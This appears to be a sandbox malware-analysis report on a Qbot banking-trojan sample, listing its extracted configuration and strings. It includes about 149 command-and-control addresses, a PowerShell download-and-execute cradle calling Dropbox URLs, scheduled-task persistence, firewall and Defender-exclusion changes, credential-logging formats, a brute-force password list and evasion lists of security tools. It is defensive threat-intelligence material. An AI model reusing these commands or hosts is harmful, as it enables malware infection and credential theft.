VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
4048C:\Users\admin\AppData\Local\Temp\sample_packed.exe /CC:\Users\admin\AppData\Local\Temp\sample_packed.exe
sample_packed.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
3221225622
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4076"C:\Users\admin\AppData\Local\Temp\sample_packed.exe" C:\Users\admin\AppData\Local\Temp\sample_packed.exe
explorer.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\sample_packed.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
Qbot
(PID) Process(4076) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Total events
166
Read events
166
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2588
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
sample_packed.exe